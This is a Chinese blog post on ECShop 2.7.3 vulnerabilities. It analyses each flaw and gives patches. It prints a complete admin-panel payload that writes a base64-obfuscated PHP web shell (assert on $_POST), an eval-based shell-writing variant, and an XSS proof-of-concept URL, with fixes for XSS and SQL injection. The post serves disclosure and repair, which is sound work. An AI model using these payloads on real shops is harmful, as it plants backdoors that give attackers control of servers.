ecshop常见漏洞

最新推荐文章于 2024-03-04 09:16:12 发布
最新推荐文章于 2024-03-04 09:16:12 发布
阅读量6.6k 收藏 2
点赞数 1
分类专栏: ecshop 文章标签: ecshop 漏洞

ECSHOP 常见注入漏洞分析和修复方法


1.测试版本

v2.7.3 RELEASE 20121106(最新)
v2.7.3 RELEASE 20120411
2.漏洞条件

需登录到后台
3.漏洞利用

1) 登陆到台后,选择模板管理,语言项编辑,搜索“用户信息”

为什么要搜索“用户信息”,还可以搜索其它的吗?

答案是搜索languages\zh_cn\user.php文件里任何一个变量都可以

2) 添加如下后门,将用户信息改为

用户信息

1
${${ fputs ( fopen ( base64_decode (Sm95Q2hvdS5waHA),w), base64_decode (PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}


即生成一个JoyChou.php文件,内容为:

1
2
3
4
5
<?php
assert(
$_POST [x]
);
?>



3) 访问user.php即可产生shell(不用注册登录账户)

http://localhost/ecshop_V2.7.3_UTF8_release0411/user.php

http://localhost/ECShop_V2.7.3_UTF8_release0411/languages/zh_cn/user.php

4.产生原因

在admin\edit_languages.php文件中第120行,修改变量内容,注意是用的双引号。
复制代码

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
for  ( $i  = 0;  $i  count ( $_POST [ 'item_id' ]);  $i ++)
     {
         /* 语言项内容如果为空,不修改 */
         if  (trim( $_POST [ 'item_content' ][ $i ]) ==  '' )
         {
             unset( $src_items [ $i ]);
         }
         else
         {
             $_POST [ 'item_content' ][ $i ] =  str_replace ( '\\\\n' '\\n' $_POST [ 'item_content' ][ $i ]);
             /* $_POST['item_content'][$i]是修改后增加的内容,即增加的"用户信息${${fputs(fopen"等内容
                $dst_items[$i] 是 $_LANG['label_profile'] = "用户信息${${fputs(fopen"; 
             */
             $dst_items [ $i ] =  $_POST [ 'item_id' ][ $i ] . ' = ' '"'  . $_POST [ 'item_content' ][ $i ].  '";' ;
         }
     }

复制代码

修改完后文件\languages\zh_cn\user.php变量为:注意是双引号哦

1
$_LANG [ 'label_profile' ] =  "用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}" ;

由于是双引号,所以只要在任意的php文件中引用这个变量,代码就会成功执行。

至于为什么可以执行?原理如下:

下面这三句话都可以执行,与其说代码执行,不如说参数执行。

1
2
3
4
5
6
<?php 
$a  "${ phpinfo()}" ;   // 有一个空格
$b  "{${phpinfo()}}" // 多一对{},但是没有空格
$c  "{${fputs(fopen(" JoyChou.php ", " w+ "), " <?php  eval (\ $_POST [1]);?> ")}}" ;
$d  "asdf{${phpinfo()}}" // {字符前可以随意加字符串
?>

而http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php这个文件包含\languages\zh_cn\user.php 这个文件,
所以也可以代码执行。

/* 载入语言文件 */

1
require_once (ROOT_PATH .  'languages/'  . $_CFG [ 'lang' ].  '/user.php' );



5.漏洞修复

了解了漏洞原理后,修复就是一件比较简单的事情,只需将双引号改为单引号

修改\admin\edit_languages.php

// 修复前

1
$dst_items [ $i ] =  $_POST [ 'item_id' ][ $i ] . ' = ' '"'  . $_POST [ 'item_content' ][ $i ].  '";' ;


// 修复后,由于想在单引号之间出现单引号,必须使用转义。

1
$dst_items [ $i ] =  $_POST [ 'item_id' ][ $i ] . ' = ' '\''  . $_POST [ 'item_content' ][ $i ].  '\';' ;



再次访问http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php已经不能生成JoyChou.php,代码没能得到执行。





Ecshop pages.lbi.php Xss漏洞,search.php注入漏洞,Ecshop version XSS漏洞
 

6.Ecshop pages.lbi.php Xss漏洞

先来分析这个漏洞的原因:

直接访问temp/compiled/pages.lbi.php时,浏览源文件,会发现如下代码:

1
<form action=”temp/compiled/pages.lbi.php” method=”get”>



显然这个form是不完全的。当构造这样的url访问时,会造成在客户端执行代码:

1
temp/compiled/pages.lbi.php/”</form><sCripT>alert(/cfreer/)</scRipt>

很显然,这个漏洞的原理就是闭合了这个form再在客户端执行javascript.

然后分析出现不闭合form的原因,打开page.lbi.php文件,可以看到如下代码

1
<form action=”<?php  echo  $_SERVER [‘PHP_SELF’]; ?>” method=”get”> <?php  if  ( $this ->_var[‘pager’][‘styleid’] == 0): ?>



这里执行$this的时候就出现错误了,,因为没有进行template的初始化。

既然找到原因了,下面给出解决办法:

打开page.lbi文件,在第二行插入如下代码:

1
<?php  if  (!defined(‘IN_ECS’)) {  die (‘Hacking attempt’); } ?>



 

7.search.php注入漏洞

search.php
大概300 源

1
if  (is_not_null( $val ) )


修改为

1
if  (is_not_null( $val ) &&  is_numeric ( $key ))


就可以了

 

8.Ecshop version XSS漏洞

打开/admin/receive.php文件中,搜索如下代码:

1
$version = $_GET [‘version’];



修改为如下代码:

1
$version =Htmlspecialchars( $_GET [‘version’]);
free_xiaochen
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ECShop全系列版本远程代码执行高危漏洞复现
a1b2c3是弱口令
09-03 8468
预警 2018年9月1日,阿里云态势感知发布预警,近日利用ECShop全系列版本的远程代码执行漏洞进行批量化攻击量呈上升趋势,该漏洞可直接导致网站服务器沦陷,黑客可通过WEB攻击直接获得服务器权限,利用简单且危害较大。因此,阿里云安全专家提醒ECShop系统用户及时进行修复。 早在1个月前阿里云态势感知就捕获到利用ECShop远程代码执行漏洞进行攻击的真实案例,由于当时该漏洞被利用进行攻击的量...
ecshop漏洞修复整理
热门推荐
龚清林的博客
06-01 6万+
1、ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库。 路径:/api/client/api.php、/api/client/includes/lib_api.php 参照以下修改: function API_UserLogin($post) { /* SQL注入过滤 ...
漏洞复现】ShopXO任意文件读取漏洞
晚风不及你
03-04 835
ShopXO是一套开源的企业级开源电子商务系统,包含PC、H5、微信小程序、支付宝小程序、百度小程序等多个终端,遵循Apache2开源协议发布,基于ThinkPHP5.1框架研发。该系统具有求实进取、创新专注、自主研发、国内领先企业级B2C电商系统解决方案等特点,可满足99%的电商运营需求。
ECSHOP漏洞
xysoul的专栏
03-20 1万+
ECSHOP漏洞集:http://sebug.net/appdir/ECSHOP ecshop后台拿shell 个人总结七种方法 最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后,测试后台拿shell。 本人整理给自己看的,大家飘过就好。BY:黑猫 ecshop后台拿shell 个人总结七种方法 一、 系统==>数据库管理==>sql查询(可爆出
ecshopsafety.php,Ecshop前台sql注入(20171228)
weixin_36250086的博客
03-12 147
这里我需要说明一下echsop具备全局的一个安全转义全局文件:/includes/init.phpif (!get_magic_quotes_gpc()){if (!empty($_GET)){$_GET = addslashes_deep($_GET);}if (!empty($_POST)){$_POST = addslashes_deep($_POST);}$_COOKIE = addsla...
常见安全漏洞
netuser1937的博客
12-19 3509
常见安全漏洞
常见十大漏洞总结(原理、危害、防御)
YJ_12340的博客
07-05 1万+
弱口令与个人习惯和安全意识相关,为了避免忘记密码,使用一个非常容易记住 的密码,或者是直接采用系统的默认密码等。
常见Web十大漏洞常见Web漏洞
qq_22792465的博客
07-27 4991
参考:https://blog.csdn.net/weixin_43376075/article/details/105189017https://blog.csdn.net/qq_43168364/article/details/105595532https://www.cnblogs.com/-qing-/p/10819069.html代码执行函数:1- eval()#传入的参数必须为PHP代码,既需要以分号结尾。比如从指定URL地址获取网页文本内容,加载指 定地址的图片,下载等等。
ECShop 注射漏洞利用工具
08-13
ECShop 注射漏洞利用工具,利用ECShop漏洞获取网站管理员用户名和密码。
ecshop常见问题
10-22
ecshop 开发过程常见问题的汇总以及解决问题的方法
Web安全测试常见逻辑漏洞解析(实战篇)
04-05
通过实战解释在web安全测试经常会遇到的一些逻辑漏洞
ECshop漏洞利用工具
11-11
ECshop漏洞利用工具 专门挖掘ECshop漏洞利用工具的漏洞,所以很好很强大的哦
ECshop漏洞
12-09
只是一段小代码,可以检测出ECSHOP的一个致命漏洞
ECSHOP漏洞利用
07-21
ECSHOP漏洞利用ECSHOP漏洞利用ECSHOP漏洞利用
C#,数值计算,解微分方程的龙格-库塔二阶方法与源代码
04-25
C#,数值计算,解微分方程的龙格-库塔二阶方法与源代码 微分方程 含有导数或微分的方程称为微分方程,未知函数为一元函数的微分方程称为常微分方程。 微分方程的阶数 微分方程导数或微分的最高阶数称为微分方程的阶数。 微分方程的解 使得微分方程成立的函数称为微分方程的解。 微分方程的特解 微分方程的不含任意常数的解称为微分方程的特解。 微分方程的通解 所含相互独立的任意常数的个数与微分方程的阶数相等的微分方程的解称为微分方程的通解。
桌面聊天室
04-25
该毕业设计采用了c/s架构,通过javase的知识编写完成,系统功能包括:用户注册,用户登录,聊天功能。 对于刚学完java基础的同学来说可以通过该毕业设计加深对所学知识的理解。该系统使用socket进行数据的发送,用户注册登录之后,可以进行多人聊天,功能类似qq群聊。
【前端素材】大数据-交通大屏.zip
最新发布
04-25
大数据技术指的是用于处理和分析大规模数据集的技术和工具。以下是一些常见的大数据技术和工具: Hadoop:Apache Hadoop是一个用于分布式存储和处理大规模数据的开源框架。它包括Hadoop Distributed File System(HDFS)用于数据存储和MapReduce用于数据处理。 Spark:Apache Spark是一个快速、通用的集群计算系统,提供了比MapReduce更快的数据处理能力。它支持内存计算和更多复杂的数据处理流程。 NoSQL数据库:NoSQL数据库(如MongoDB、Cassandra等)则更适用于处理这类数据。 数据仓库:数据仓库是一个用于集成和分析大规模数据的存储系统,一些知名的数据仓库包括Snowflake、Amazon Redshift等。 数据湖:数据湖是一个存储结构化和非结构化数据的存储池,用于支持数据分析和机器学习应用。 机器学习:大数据技术也广泛应用于机器学习领域,支持大规模数据的模型训练和预测分析。 流式处理:针对实时数据处理需求,流式处理技术(如Apache Kafka、Apache Flink)可以实时。
inspect:windows系统下的控件识别工具
04-25
windows系统下的控件识别工具,可用于桌面应用的UI自动化测试
ecshop前台漏洞
09-02
ECShop前台漏洞是指在ECShop电商系统的前台界面存在的安全漏洞。根据引用的资料,ECShop的前台漏洞链主要是基于ECShop过去的漏洞,并以insert_mod为主要入口点。具体来说,在ECShop 4.0.7版本漏洞入口点位于user.php文件的第1146行。 在这个漏洞,display函数起着重要的作用。在之前的严重漏洞,display函数也扮演了重要角色。在这次漏洞,通过读取模板注入后的文件内容,如果存在echash字段,则进行切割分析。 需要注意的是,由于漏洞的具体细节未提供,因此无法提供更加详细的分析。但是可以得出的结论是,在ECShop的前台界面存在安全漏洞,可能会受到攻击者的利用。因此,建议ECShop用户及时关注官方的安全公告,并及时更新系统补丁以避免受到潜在的攻击风险。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ECShop 4.0 前台SQL注入漏洞分析(需用户注册)](https://blog.csdn.net/weixin_39711867/article/details/115105521)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值